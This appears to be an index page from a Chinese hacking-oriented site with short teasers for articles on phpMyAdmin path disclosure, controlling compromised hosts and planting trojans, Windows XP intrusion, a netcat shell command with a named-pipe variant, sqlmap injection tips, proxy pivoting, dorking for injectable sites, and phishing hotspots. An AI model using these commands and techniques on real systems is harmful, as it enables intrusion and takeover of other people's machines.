1.如何拿到登陆密码,自己想办法。 2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径. 3.选择一个Database....
最受黑客喜欢的五种网络口令
现在企业大部分的网络设备与应用软件,都是依靠口令来保证其安全性的。若口令丢失的话,可想而知,会给企业的网络安全带来多大的风险,很可能在不知不觉中,企业网络中的主机成为了黑客的肉鸡,成为他们攻击其他网络...
教你如何在远程3389终端主机上直接Copy文件
很多朋友登上3389肉鸡上的时后.因为下载木马或文件经常是个头疼的问题 有些朋友利用主页来下载,也就是说用3389肉鸡的IE下载木马来运行呵呵~如果本地管理员是个高度傻瓜那没话说,如果是中度傻瓜的话,...
介绍黑客入侵Windows XP的常用方法
第一招、屏幕保护 在Windows中启用了屏幕保护之后,只要我们离开计算机(或者不操作计算机)的时间达到预设的时间,系统就会自动启动屏幕保护程序,而当用户移动鼠标或敲击键盘想返回正常工作状态时,系统就...
网络安全
Unix系统NC反弹shell的方法
NC的原生做法: nc -l -vv -p 2222 -e /bin/bash无法使用NC反弹的时候可以这样 先在tmp创建一个普通管道mknod /tmp/backpipe p或者mkfifo /t...
Sqlmap注入技巧集锦
软件名称:sqlmap 一个自动SQL 射入工具(sqlmap.py)汉化直接可用版软件大小:6.4MB更新时间:2012-10-16 TIP1 当我们注射的时候,判断注入 http://site/s...
网络安全
利用php+socket5代理进行内网渗透测试
我用到的工具是phpsocks和大家经常翻墙用的goagent,两款软件相对比,各有优势,phpsocks需要连接数据库,不过这个问题可以通过自 己修改下他的PHP脚本和java客户端即可解决,昨天想...
网络安全
教你使用搜索引擎批量检测网站注入点
可是在最近2年,已经无法通过百度批量查找网站是否存在注入漏洞了。 例如:我们要搜索所有网站后缀存在common.asp?id=页面的时候就可以通过inurl:common.asp?id=进行批量检测那...
网络安全
MS-DOS时代的计算机病毒是什么样子的?
身为作家也是展出策划人的Bas van de Poel策划了“危险的思想”艺术展,在计算机病毒这个展类里,我们看到画家们将计算史上最凶残的病毒用MS-DOS风格展现在画作中。“它们(病毒)...
网络安全
Back Track5下建立“钓鱼”热点测试
BackTrack,是一套专业的计算机安全检测的Linux操作系统,简称BT。它破解WEP,WPA/WPA2加密方式的无线网络也不在话下,当然前提是需要有足够强大的密码字典文件。本文作者Jn分享了如何...
